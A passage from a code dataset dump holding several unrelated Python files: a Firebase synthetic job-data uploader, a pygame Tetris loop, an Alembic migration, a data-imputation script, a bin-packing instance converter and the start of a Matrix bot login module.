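print(f1_score(y_true, y_pred, average="macro"))  # unweighted mean of per-class F1
print(confusion_matrix(y_true, y_pred))           # rows = true class, cols = predicted
```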
Job_List:\n\n # Creating and uploading data to Workers collection on firebase\n\n def __init__(self):\n\n self.job_list = []\n\n self.organisation_list = []\n\n self.skills_list = None\n\n self.experience_list = []\n\n self.start_date = None\n\n self.end_date = None\n\n self.start_date_list = []\n\n self.end_date_list = []\n\n self.pincode_list = [\n '110001', # Delhi\n '400001', # Mumbai\n '700001', # Kolkata\n ]\n \"\"\" \n '600001', # Chennai\n '560001', # Bangalore\n '411001', # Pune\n '380001', # Ahmedabad\n '500001', # Hyderabad\n '302001', # Jaipur\n '800001', # Patna\n '560066', # Electronic City, Bangalore\n '400086', # Andheri, Mumbai\n '600040', # T. Nagar, Chennai\n '411014', # Hinjewadi, Pune\n '500081', # Gachibowli, Hyderabad\n '560008', # Malleshwaram, Bangalore\n '380009', # Navrangpura, Ahmedabad\n '700091', # Salt Lake City, Kolkata\n '110020', # Hauz Khas, Delhi\n '302017' # Malviya Nagar, Jaipur\n # Add more PIN codes here...\n ]\n \"\"\"\n\n\n\n self.primary_skills = [\n \"Construction Laborer\",\n \"Agricultural Worker\",\n \"Mason\",\n \"Carpenter\",\n \"Painter\",\n \"Plumber\",\n ]\n \"\"\"\n \"Electrician\",\n \"Welder\",\n \"Loader/Unloader\",\n \"Housekeeper\",\n \"Janitor\",\n \"Cleaner\",\n \"Gardener\",\n \"Security Guard\",\n \"Factory Worker\",\n \"Packaging Worker\",\n \"Helper\",\n \"Driver\",\n \"Delivery Person\",\n \"Garbage Collector\",\n \"Street Vendor\",\n \"Farm Laborer\",\n \"Brick Maker\",\n \"Road Sweeper\",\n \"Tea Picker\",\n \"Textile Worker\",\n \"Fisherman\",\n \"Construction Site Watchman\",\n \"Cycle Rickshaw Puller\",\n \"Auto Rickshaw Driver\"\n ]\n \"\"\"\n\n self.secondary_skills = [\n \"Construction Laborer\",\n \"Agricultural Worker\",\n \"Mason\"\n ]\n \"\"\"\n \"Carpenter\",\n \"Painter\",\n \"Plumber\",\n \"Electrician\",\n \"Welder\",\n \"Loader/Unloader\",\n \"Housekeeper\",\n \"Janitor\",\n \"Cleaner\",\n \"Gardener\",\n \"Security Guard\",\n \"Factory Worker\",\n \"Packaging Worker\",\n \"Helper\",\n \"Driver\",\n \"Delivery Person\",\n \"Garbage Collector\",\n \"Street Vendor\",\n \"Farm Laborer\",\n \"Brick Maker\",\n \"Road Sweeper\",\n \"Tea Picker\",\n \"Textile Worker\",\n \"Fisherman\",\n \"Construction Site Watchman\",\n \"Cycle Rickshaw Puller\",\n \"Auto Rickshaw Driver\"\n \"\"\"\n\n\n self.qualifications = [\n '8th Pass',\n '10th Pass',\n '12th Pass',\n 'Graduation',\n \"Post graduation\",\n ]\n\n self.company_names = [\n \"Shramik Solutions\",\n \"Kamgar Staffing\",\n \"Kaushal Labor Co.\",\n ]\n \"\"\"\n \"Naukari Services\",\n \"Mazdoor Manpower\",\n \"SkillKart Staffing\",\n \"Kadambari Labor Solutions\",\n \"Saksham Labor Providers\",\n \"Kushal LaborForce\",\n \"Samarth Skilled Staffing\",\n \"Shram Sangathan Agency\",\n \"KaamChakra Labor Co.\",\n \"Rozgar Staffing\",\n \"Hunar Labor Solutions\",\n \"Sangharsh Labor Providers\",\n \"Sambhav Labor Group\",\n \"Yashasvi Labor Agency\",\n \"Kausalya Skilled Staffing\",\n \"KadamKadam Labor Solutions\",\n \"Karigar Staffing\",\n \"Kausal Labor Co.\",\n \"Samarpan Labor Providers\",\n \"Pragati Skilled Staffing\",\n \"Sambandh Labor Solutions\",\n \"Karyarat Labor Agency\",\n \"KaamSevak Staffing\",\n \"Kushalta Labor Group\",\n \"Samarthak Labor Solutions\",\n \"Sashakt Labor Agency\",\n \"Nirmaan Staffing\",\n \"KarmaYogi Labor Co.\"\n \"\"\"\n\n self.job_titles = [\n \"Laborer\",\n \"Janitor\",\n \"Warehouse Worker\",\n ]\n \"\"\"\n \"Production Worker\",\n \"Cleaner\",\n \"Farm Worker\",\n \"Construction Helper\",\n \"Kitchen Staff\",\n \"Landscaping 
Laborer\",\n \"Housekeeper\",\n \"Packer\",\n \"Delivery Driver\",\n \"Assembler\",\n \"Dishwasher\",\n \"Retail Associate\",\n \"Security Guard\",\n \"Valet Parking Attendant\",\n \"Car Wash Attendant\",\n \"Food Service Worker\",\n \"Stock Clerk\",\n \"Cashier\",\n \"Laundry Attendant\",\n \"Gardener\",\n \"Garbage Collector\",\n \"Mover\",\n \"Security Officer\",\n \"General Maintenance Worker\",\n \"Data Entry Clerk\",\n \"Groundskeeper\",\n \"Production Operator\"\n \"\"\"\n self.skill_level = [\n 'Less than 1 year',\n '1 to 10 years',\n 'More than 10 years'\n ]\n \n def location_api(self):\n\n self.pincode = random.choice(self.pincode_list)\n\n api = requests.get('https://api.postalpincode.in/pincode/' + self.pincode)\n\n response = api.json()\n\n \n data = response[0]['PostOffice'][0]\n self.area = data['Region']\n self.district = data['District']\n self.state = data['State']\n\n def firebase(self):\n cred = credentials.Certificate('jansakti-andrew-firebase-adminsdk.json')\n firebase_admin.initialize_app(cred)\n self.db = firestore.client()\n return self.db\n\n def generate_dates(self):\n\n current_date = datetime.now()\n\n start_date_offset = random.randint(1, 30)\n\n self.start_date = current_date + timedelta(days=start_date_offset)\n\n end_date_offset = random.randint(1, start_date_offset)\n\n self.end_date = self.start_date + timedelta(days=end_date_offset)\n\n def generate_max_age(self):\n\n min_age = 18\n\n max_age = min_age + 30 + random.randint(1,17)\n\n return max_age\n \n def generate_organisation_data(self):\n self.location_api()\n organisation = {\n 'area': self.area,\n 'district': self.district,\n 'state': self.state,\n 'created_on': datetime.now(),\n 'organisation_name': random.choice(self.company_names)\n }\n\n self.organisation_list.append(organisation)\n\n return self.organisation_list\n \n def randomise(self):\n\n self.organisation_list = [] \n\n random_organisation = pd.DataFrame(self.generate_organisation_data())\n return random_organisation\n \n def upload_data(self):\n\n pd.set_option('display.max_columns', None)\n\n df = self.randomise().transpose()\n\n dic = df.to_dict()\n\n for idx in range(0, len(dic)):\n\n self.db.collection('Organisations').add(dic[idx])\n \n def generate_job_data(self):\n\n self.location_api()\n self.generate_dates()\n \n job = {\n 'organisation_name': random.choice(self.company_names),\n 'job_title': random.choice(self.job_titles),\n 'gender': random.choice(['Male', 'Female', 'Gender Neutral']),\n 'min_qualification': random.choice(self.qualifications),\n 'primary_skills': random.choice(self.primary_skills),\n 'secondary_skills': random.sample(self.secondary_skills, random.randint(1, 3)),\n 'skill_level': random.choice(self.skill_level),\n 'state': self.state,\n 'district': self.district,\n 'area': self.area,\n 'pincode': self.pincode,\n 'min_age': 18,\n 'max_age': self.generate_max_age(),\n 'start_date': self.start_date.strftime(\"%d/%m/%y\"),\n 'end_date': self.end_date.strftime(\"%d/%m/%y\"),\n 'filled': random.randint(0, 20),\n 'number_of_vacancies': random.randint(0,20),\n }\n\n self.job_list.append(job)\n\n return self.job_list\n \n def randomise_subcollection_data(self):\n\n random_job_choice = random.randint(1,5)\n\n for _ in range(random_job_choice):\n\n self.random_job_data = pd.DataFrame(self.generate_job_data())\n\n def upload_subcollection_data(self):\n\n self.randomise_subcollection_data()\n\n collection_ref = self.db.collection('Organisations')\n query = collection_ref.order_by('created_on', 
direction=firestore.Query.DESCENDING).limit(1)\n documents = query.get()\n\n for parent_doc in documents:\n parent_doc_id = parent_doc.id\n parent_doc_ref = collection_ref.document(parent_doc_id)\n\n jobs_subcollection_ref = parent_doc_ref.collection('Jobs')\n\n for _, job_row in self.random_job_data.iterrows():\n \n jobs_subcollection_ref.add(job_row.to_dict())\n\n self.random_job_data.drop(self.random_job_data.index)\n\n \njl = Job_List()\n\njl.firebase()\n\nfor _ in range(10):\n jl.upload_data()\n jl.upload_subcollection_data()\n","repo_name":"invenics-andrewclark/Recommendation_Engine","sub_path":"Job_List.py","file_name":"Job_List.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72137911847","text":"import pygame\nfrom pygame.mixer import find_channel\n\nfrom Tools import terminate\nfrom Tools.Image import load_image\n\nfrom PyGame_Additions import SingleSprite\n\nfrom GUI_Stages.game_interface import GameInterface\nfrom Game_Parts import GameBoard\n\nfrom constants import SCREEN_SIZE\nfrom game_events import PLAY_SCORE_SOUND\n\nRUNNING = True\n\npygame.init()\nSCREEN = pygame.display.set_mode(SCREEN_SIZE)\npygame.display.set_icon(load_image(\"icon.png\", -1))\npygame.display.set_caption(\"Python Tetris v2.0\")\nCLOCK = pygame.time.Clock()\nFRAMERATE_LOCK = 60\n\nFON = SingleSprite(\"background.png\")\n\npygame.mixer.music.load('data/music/main_theme.ogg')\npygame.mixer.music.play(-1)\nSCORE_SOUND = pygame.mixer.Sound('data/music/deleting_line_sound.wav')\nSCORE_SOUND.set_volume(0.4)\n\nINTERFACE = GameInterface()\nGAME = GameBoard()\n\n\nwhile RUNNING:\n FON.draw(SCREEN)\n\n INTERFACE.update_without_event(CLOCK)\n GAME.update_without_event(pygame, pygame.time.get_ticks())\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n\n if event.type == PLAY_SCORE_SOUND:\n channel = find_channel(True)\n channel.play(SCORE_SOUND)\n\n INTERFACE.update(pygame, event)\n GAME.update(pygame, event)\n\n GAME.draw(SCREEN)\n INTERFACE.draw(SCREEN)\n\n CLOCK.tick(60)\n pygame.display.flip()\n","repo_name":"Kirill-Lekhov/tetris","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14631481664","text":"# -*- coding: utf-8 -*-\nimport vovp\nimport torch as th\nimport multiprocessing as mp\n\ndef subprocess_client(tensor):\n print(tensor)\n del tensor\n # vovp.get_client().list()\n\n\ndef test_basic_client():\n client = vovp.init_client(\"/tmp/dgl_socket\")\n vovp.init_reduction()\n # vovp.\n a = th.tensor([[1, 2, 3], [5, 4, 6]], device=\"cuda\")\n ctx = mp.get_context('spawn')\n queue = ctx.Queue()\n barrier = ctx.Barrier()\n p = ctx.Process(target=subprocess_client, args=(a, barrier))\n p.start()\n del a\n p.join()\n # ret_list = queue.get()\n # for ret in ret_list:\n # assert ret\n\nif __name__==\"__main__\":\n test_basic_client()\n","repo_name":"VoVAllen/vovp","sub_path":"tests/test_mp_pickle.py","file_name":"test_mp_pickle.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72122242407","text":"\"\"\"Initial tables\n\nRevision ID: e748549d8d91\nRevises: \nCreate Date: 2023-01-12 19:21:58.431417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.exc import OperationalError\n\n# revision identifiers, 
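`upload_subcollection_data` above locates the newest organisation with an ordered, limited Firestore query and writes each job into that document's `Jobs` subcollection. A condensed sketch of that access pattern, assuming `firebase_admin` has already been initialized with valid credentials (as `Job_List.firebase` does); the job payload is illustrative:

```python
from firebase_admin import firestore

db = firestore.client()
orgs = db.collection('Organisations')

# Newest organisation document: order by creation time, keep one.
newest = orgs.order_by(
    'created_on', direction=firestore.Query.DESCENDING).limit(1).get()

for doc in newest:
    # Each job becomes a document in the org's 'Jobs' subcollection.
    jobs = orgs.document(doc.id).collection('Jobs')
    jobs.add({'job_title': 'Laborer', 'number_of_vacancies': 3})
```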
used by Alembic.\nrevision = \"e748549d8d91\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n bind = op.get_bind()\n if bind.engine.name == \"sqlite\":\n binary_type = sa.BLOB()\n json_type = sa.JSON()\n else:\n from sqlalchemy.dialects.postgresql import BYTEA, JSONB\n\n binary_type = BYTEA()\n json_type = JSONB()\n\n # ### commands auto generated by Alembic - please adjust! ###\n op.execute(\"DROP TABLE IF EXISTS tags\")\n op.execute(\"DROP TABLE IF EXISTS verification\")\n op.execute(\"DROP TABLE IF EXISTS events\")\n try:\n op.create_table(\n \"auth\",\n sa.Column(\"pubkey\", sa.Text(), nullable=False),\n sa.Column(\"roles\", sa.Text(), nullable=True),\n sa.Column(\"created\", sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint(\"pubkey\"),\n )\n except OperationalError:\n print(\"Auth table already exists\")\n\n op.create_table(\n \"events\",\n sa.Column(\"id\", binary_type, nullable=False),\n sa.Column(\"created_at\", sa.Integer(), nullable=True),\n sa.Column(\"kind\", sa.Integer(), nullable=True),\n sa.Column(\"pubkey\", binary_type, nullable=True),\n sa.Column(\"tags\", json_type, nullable=True),\n sa.Column(\"sig\", binary_type, nullable=True),\n sa.Column(\"content\", sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"createdidx\", \"events\", [\"created_at\"], unique=False)\n op.create_index(\"kindidx\", \"events\", [\"kind\"], unique=False)\n op.create_index(\"pubkeyidx\", \"events\", [\"pubkey\"], unique=False)\n try:\n op.create_table(\n \"identity\",\n sa.Column(\"identifier\", sa.Text(), nullable=False),\n sa.Column(\"pubkey\", sa.Text(), nullable=True),\n sa.Column(\"relays\", json_type, nullable=True),\n sa.PrimaryKeyConstraint(\"identifier\"),\n )\n except OperationalError:\n print(\"Identity table already exists\")\n\n op.create_table(\n \"tags\",\n sa.Column(\"id\", binary_type, nullable=True),\n sa.Column(\"name\", sa.Text(), nullable=True),\n sa.Column(\"value\", sa.Text(), nullable=True),\n sa.ForeignKeyConstraint([\"id\"], [\"events.id\"], ondelete=\"CASCADE\"),\n sa.UniqueConstraint(\"id\", \"name\", \"value\", name=\"unique_tag\"),\n )\n op.create_index(\"tagidx\", \"tags\", [\"name\", \"value\"], unique=False)\n op.create_table(\n \"verification\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"identifier\", sa.Text(), nullable=True),\n sa.Column(\"metadata_id\", binary_type, nullable=True),\n sa.Column(\"verified_at\", sa.TIMESTAMP(), nullable=True),\n sa.Column(\"failed_at\", sa.TIMESTAMP(), nullable=True),\n sa.ForeignKeyConstraint([\"metadata_id\"], [\"events.id\"], ondelete=\"CASCADE\"),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"identifieridx\", \"verification\", [\"identifier\"], unique=False)\n op.create_index(\"metadataidx\", \"verification\", [\"metadata_id\"], unique=False)\n op.create_index(\"verifiedidx\", \"verification\", [\"verified_at\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(\"verifiedidx\", table_name=\"verification\")\n op.drop_index(\"metadataidx\", table_name=\"verification\")\n op.drop_index(\"identifieridx\", table_name=\"verification\")\n op.drop_table(\"verification\")\n op.drop_index(\"tag_idx\", table_name=\"tags\")\n op.drop_table(\"tags\")\n op.drop_table(\"identity\")\n op.drop_index(\"pkidx\", table_name=\"events\")\n op.drop_index(\"kidx\", table_name=\"events\")\n op.drop_index(\"cidx\", table_name=\"events\")\n op.drop_table(\"events\")\n op.drop_table(\"auth\")\n # ### end Alembic commands ###\n","repo_name":"davestgermain/nostr_relay","sub_path":"nostr_relay/alembic/versions/e748549d8d91_initial_tables.py","file_name":"e748549d8d91_initial_tables.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"72012428968","text":"# Author: Aidan Kierans\r\n\r\nimport pandas as pd\r\nfrom math import sqrt\r\nfrom multiprocessing import Pool\r\n\r\n# Make the data sets into DataFrames\r\ndf05 = pd.read_csv('dataset_missing05.csv')\r\ndf20 = pd.read_csv('dataset_missing20.csv')\r\ndf_complete = pd.read_csv('dataset_complete(1).csv')\r\n\r\n# Convert the first eight columns to float64s, and the ?s into NaNs for pandas\r\ndf05['F1'] = pd.to_numeric(df05['F1'], errors='coerce')\r\ndf05['F2'] = pd.to_numeric(df05['F2'], errors='coerce')\r\ndf05['F3'] = pd.to_numeric(df05['F3'], errors='coerce')\r\ndf05['F4'] = pd.to_numeric(df05['F4'], errors='coerce')\r\ndf05['F5'] = pd.to_numeric(df05['F5'], errors='coerce')\r\ndf05['F6'] = pd.to_numeric(df05['F6'], errors='coerce')\r\ndf05['F7'] = pd.to_numeric(df05['F7'], errors='coerce')\r\ndf05['F8'] = pd.to_numeric(df05['F8'], errors='coerce')\r\n\r\ndf20['F1'] = pd.to_numeric(df20['F1'], errors='coerce')\r\ndf20['F2'] = pd.to_numeric(df20['F2'], errors='coerce')\r\ndf20['F3'] = pd.to_numeric(df20['F3'], errors='coerce')\r\ndf20['F4'] = pd.to_numeric(df20['F4'], errors='coerce')\r\ndf20['F5'] = pd.to_numeric(df20['F5'], errors='coerce')\r\ndf20['F6'] = pd.to_numeric(df20['F6'], errors='coerce')\r\ndf20['F7'] = pd.to_numeric(df20['F7'], errors='coerce')\r\ndf20['F8'] = pd.to_numeric(df20['F8'], errors='coerce')\r\n\r\n# set precision to five digits after the decimal point\r\ndf05 = df05.round(decimals=5)\r\ndf20 = df20.round(decimals=5)\r\ndf_complete = df_complete.round(decimals=5)\r\n\r\n# mean imputation\r\ndf05_mean = df05.fillna(df05.mean())\r\ndf20_mean = df20.fillna(df20.mean())\r\n\r\n\r\n# conditional mean imputation\r\n# add the original index of each row to the df so that they can be put back in this order later\r\ndf05.reset_index(inplace=True)\r\ndf20.reset_index(inplace=True)\r\n\r\n\r\n# sort the rows of a df back into the original order, then drop the 'index' column\r\ndef reset_order(df):\r\n return df.sort_values('index').filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n\r\n\r\n# split each df into a separate df for each condition - this could probably be optimized\r\ndf05_yes = df05.groupby('Class').get_group('Yes')\r\ndf05_no = df05.groupby('Class').get_group('No')\r\ndf20_yes = df20.groupby('Class').get_group('Yes')\r\ndf20_no = df20.groupby('Class').get_group('No')\r\n\r\ndf05_c_mean = df05_yes.fillna(df05_yes.mean()).append(df05_no.fillna(df05_no.mean()))\r\ndf20_c_mean = df20_yes.fillna(df20_yes.mean()).append(df20_no.fillna(df20_no.mean()))\r\n\r\ndf05_c_mean = reset_order(df05_c_mean)\r\ndf20_c_mean = reset_order(df20_c_mean)\r\n\r\n\r\n# hot deck 
imputation\r\n# calculate the euclidean distances between two rows\r\ndef distance(row1, row2, mask):\r\n # remove columns with missing values, convert rows from series to lists here if I need to.\r\n r1 = row1.loc[mask] # .to_list()\r\n r2 = row2.loc[mask] # .to_list()\r\n # compute and return the euclidean distance between the rows\r\n if r1.size > 0:\r\n return sqrt(sum([(x - y) ** 2 for x, y in zip(r1, r2)])) / r1.size\r\n else:\r\n return 1\r\n\r\n\r\ndef hot_deck(df):\r\n df_hd = df.copy()\r\n df = df.filter(like='F', axis=1)\r\n df_temp = df.assign(Distance=1.0)\r\n for i in df.iterrows():\r\n # make sure this row has missing values in the first place before trying to impute them\r\n if i[1].hasnans:\r\n # find the distance between i and each other row\r\n for j in df.iterrows():\r\n # skip this iteration if i and j are the same row; i is as far as possible from itself by default\r\n if i[0] == j[0]:\r\n continue\r\n # form a boolean mask that's true for each column that i and j both have a value in\r\n match = i[1].notna() & j[1].notna()\r\n # pass i, j, and the mask to distance() and add the result to the Distance column of df_temp\r\n df_temp.at[j[0], 'Distance'] = distance(i[1], j[1], match)\r\n # sort the resulting data so that the shortest distance is moved to the top and i is at the bottom\r\n df_temp = df_temp.sort_values('Distance')\r\n # pick the available values from the closest row until i is filled\r\n for k in df_temp.iterrows():\r\n # if the ith row of the df still has missing values...\r\n if df_hd.loc[i[0]].hasnans:\r\n # ...keep trying to impute them\r\n temp = df_hd.loc[i[0]].combine_first(k[1])\r\n df_hd.loc[i[0]] = temp\r\n else:\r\n break\r\n # if i[0] % 500 == 0:\r\n # print(\"i[0]: \" + str(i[0]))\r\n return df_hd\r\n\r\n\r\ndef set_df05_hd():\r\n # print(\"Finding df05_hd\")\r\n df = hot_deck(df05)\r\n df.round(decimals=5).to_csv('V00819990_missing05_imputed_hd.csv', index=False)\r\n\r\n\r\ndef set_df20_hd():\r\n # print(\"Finding df20_hd\")\r\n df = hot_deck(df20)\r\n df.round(decimals=5).to_csv('V00819990_missing20_imputed_hd.csv', index=False)\r\n\r\n\r\n# conditional hot deck imputation\r\ndef set_df05_chd():\r\n print(\"Finding df05_chd\")\r\n df = reset_order(hot_deck(df05_yes).append(hot_deck(df05_no)))\r\n df.round(decimals=5).to_csv('V00819990_missing05_imputed_hd_conditional.csv', index=False)\r\n\r\n\r\ndef set_df20_chd():\r\n print(\"Finding df20_chd\")\r\n df = reset_order(hot_deck(df20_yes).append(hot_deck(df20_no)))\r\n df.round(decimals=5).to_csv('V00819990_missing20_imputed_hd_conditional.csv', index=False)\r\n\r\n\r\n# impute asynchronously\r\nif __name__ == '__main__':\r\n pool = Pool(processes=2)\r\n\r\n # Start each process\r\n pr05hd = pool.apply_async(set_df05_hd)\r\n pr20hd = pool.apply_async(set_df20_hd)\r\n pr05chd = pool.apply_async(set_df05_chd)\r\n pr20chd = pool.apply_async(set_df20_chd)\r\n\r\n pool.close()\r\n pool.join()\r\n\r\n # calculation of mean absolute error\r\n # if not for this assignment's constraint that the code must be in a .py file, mean_ae would be Cython\r\n def mean_ae(df_missing, df_imputed, df_correct):\r\n ae = 0\r\n count = 0\r\n df_missing = df_missing.filter(like='F', axis=1)\r\n df_imputed = df_imputed.filter(like='F', axis=1)\r\n df_correct = df_correct.filter(like='F', axis=1)\r\n for r in df_missing.iterrows():\r\n for item in r[1].iteritems():\r\n ae += abs(df_imputed.at[r[0], item[0]] - df_correct.at[r[0], item[0]])\r\n count += 1\r\n # Divide the sum of errors by the number of errors, and round 
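The hot-deck loop above fills a recipient row from its nearest donors with `Series.combine_first`, which keeps the caller's values and only borrows the donor's values where the caller is NaN. A minimal illustration with toy rows:

```python
import numpy as np
import pandas as pd

# Toy recipient with missing values and its nearest "donor" row.
recipient = pd.Series([1.0, np.nan, 3.0, np.nan], index=['F1', 'F2', 'F3', 'F4'])
donor     = pd.Series([9.0, 2.0, 9.0, 4.0],      index=['F1', 'F2', 'F3', 'F4'])

# combine_first keeps recipient values and borrows donor values
# only at NaN positions -> [1.0, 2.0, 3.0, 4.0]
print(recipient.combine_first(donor))
```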
to the nearest ten-thousandth\r\n return round(ae/count, 4)\r\n\r\n # Load the hot-deck-imputed data back into Dataframes\r\n df05_hd = pd.read_csv('V00819990_missing05_imputed_hd.csv')\r\n df20_hd = pd.read_csv('V00819990_missing20_imputed_hd.csv')\r\n df05_chd = pd.read_csv('V00819990_missing05_imputed_hd_conditional.csv')\r\n df20_chd = pd.read_csv('V00819990_missing20_imputed_hd_conditional.csv')\r\n\r\n # make sure the dfs only include the columns they started with\r\n df05_mean = df05_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_c_mean = df05_c_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_hd = df05_hd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_chd = df05_chd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_mean = df20_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_c_mean = df20_c_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_hd = df20_hd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_chd = df20_chd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n\r\n # output each imputed df to csv (but first print mea and make sure that they have the right number of digits)\r\n print(f\"MAE_05_mean = \" + str(mean_ae(df05, df05_mean, df_complete)))\r\n df05_mean.round(decimals=5).to_csv('V00819990_missing05_imputed_mean.csv', index=False)\r\n\r\n print(\"MAE_05_mean_conditional = \" + str(mean_ae(df05, df05_c_mean, df_complete)))\r\n df05_c_mean.round(decimals=5).to_csv('V00819990_missing05_imputed_mean_conditional.csv', index=False)\r\n\r\n print(\"MAE_05_hd = \" + str(mean_ae(df05, df05_hd, df_complete)))\r\n\r\n print(\"MAE_05_hd_conditional = \" + str(mean_ae(df05, df05_chd, df_complete)))\r\n\r\n print(\"MAE_20_mean = \" + str(mean_ae(df20, df20_mean, df_complete)))\r\n df20_mean.round(decimals=5).to_csv('V00819990_missing20_imputed_mean.csv', index=False)\r\n\r\n print(\"MAE_20_mean_conditional = \" + str(mean_ae(df20, df20_c_mean, df_complete)))\r\n df20_c_mean.round(decimals=5).to_csv('V00819990_missing20_imputed_mean_conditional.csv', index=False)\r\n\r\n print(\"MAE_20_hd = \" + str(mean_ae(df20, df20_hd, df_complete)))\r\n\r\n print(\"MAE_20_hd_conditional = \" + str(mean_ae(df20, df20_chd, df_complete)))\r\n","repo_name":"aidankierans/Portfolio","sub_path":"CSV Data Imputation/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":8858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14080281776","text":"import json\nimport math\n\nimport os, sys\nimport re\n\nimport Model\n\nimport numpy as np\n\nclass BinSerialization:\n def __init__(self, dx, dy, dz, capacity = -1):\n self.Capacity = capacity\n self.Length = dx\n self.Width = dy\n self.Height = dz\n\nclass ItemSerialization:\n def __init__(self, id, dx, dy, dz, quantity):\n self.Id = id\n self.Volume = dx * dy * dz\n self.Length = dx\n self.Width = dy\n self.Height = dz\n self.Amount = quantity\n\nclass Converter:\n @staticmethod\n def ConvertFromSubproblem(items, container, timeLimit, instanceId):\n newContainer = BinSerialization(container.Dx, container.Dy, 1)\n newItems = []\n\n areaSum = 0.0\n for i, item in enumerate(items):\n newItem = ItemSerialization(i, item.Dx, item.Dy, 1, 1)\n\n areaSum += item.Dx * item.Dy\n\n newItems.append(newItem)\n\n numberOfItemTypes = 
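The `mean_ae` function above iterates over every feature cell of every row with nested loops. Assuming the intent is exactly that (an average over all cells, not just the originally missing ones), the same quantity can be computed in one vectorized pandas expression; the frames below are toy data:

```python
import pandas as pd

def mean_ae_vectorized(df_imputed, df_correct):
    # Same quantity as the nested loops above: mean absolute error
    # over every feature cell, rounded to four decimal places.
    diff = (df_imputed.filter(like='F', axis=1)
            - df_correct.filter(like='F', axis=1)).abs()
    return round(float(diff.to_numpy().mean()), 4)

a = pd.DataFrame({'F1': [1.0, 2.0], 'F2': [3.0, 4.0]})
b = pd.DataFrame({'F1': [1.5, 2.0], 'F2': [3.0, 3.0]})
print(mean_ae_vectorized(a, b))  # (0.5 + 0 + 0 + 1.0) / 4 = 0.375
```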
len(newItems)\n\n epsilon = 100 * (1.0 - float(areaSum) / float(container.Dx * container.Dy))\n\n itemWidths = np.array([item.Dx for item in items])\n itemHeights = np.array([item.Dy for item in items])\n\n percentileDx25 = int(np.percentile(itemWidths, 25))\n percentileDx50 = int(np.percentile(itemWidths, 50))\n maxDx = max(itemWidths)\n\n percentileDy25 = int(np.percentile(itemHeights, 25))\n percentileDy50 = int(np.percentile(itemHeights, 50))\n maxDy = max(itemHeights)\n\n newJsonDict = {}\n\n name = f\"{instanceId}e{int(epsilon)}w{container.Dx}h{container.Dy}n{len(items)}dx-25-50-100_{percentileDx25}_{percentileDx50}_{maxDx}dy-25-50-100_{percentileDy25}_{percentileDy50}_{maxDy}t{int(timeLimit)}\"\n newJsonDict[\"Name\"] = name\n newJsonDict[\"InstanceType\"] = \"2D-OPP\"\n newJsonDict[\"NumberItemTypes\"] = numberOfItemTypes\n\n newJsonDict[\"Container\"] = newContainer\n newJsonDict[\"ItemTypes\"] = newItems\n\n with open(os.path.join(\"data\", \"2D-OPP-subproblems\", name + \".json\"), \"w\") as fp:\n print(f\"Instance {name} saved\")\n json.dump(newJsonDict, fp, indent=4, default=lambda x: x.__dict__)","repo_name":"ktnr/BinPacking2D","sub_path":"packingSolver/HelperIO.py","file_name":"HelperIO.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"5601267232","text":"from nio import (AsyncClient,\n AsyncClientConfig,\n LoginResponse,\n JoinedMembersError,\n JoinedMembersResponse,)\nfrom aiohttp import (ClientConnectionError,\n ServerDisconnectedError)\nfrom asyncio import sleep\nimport os\nimport json\nimport logging\n\nimport config as configfile\n\nlogger = logging.getLogger()\n\ndata_dir = configfile.datadir_bot\nif not os.path.exists(data_dir):\n os.mkdir(data_dir)\nconfig_file = f\"{data_dir}/credentials.json\"\nstore_path = f\"{data_dir}/store\"\n\n\nasync def write_details_to_disk(resp: LoginResponse, home_server) -> None:\n with open(config_file, \"w\") as f:\n json.dump(\n {\n \"home_server\": home_server,\n \"user_id\": resp.user_id,\n \"device_id\": resp.device_id,\n \"access_token\": resp.access_token,\n },\n f,\n )\n\n\nasync def login() -> AsyncClient:\n bot_name = configfile.bot_name\n bot_pass = configfile.bot_pass\n home_server = configfile.home_server\n device_name = configfile.device_name\n\n bot_config = AsyncClientConfig(\n store_sync_tokens=True,\n encryption_enabled=True,\n )\n\n if not os.path.exists(config_file):\n\n if not (home_server.startswith(\"https://\") or home_server.startswith(\"http://\")):\n home_server = \"https://\" + home_server\n\n if not os.path.exists(store_path):\n 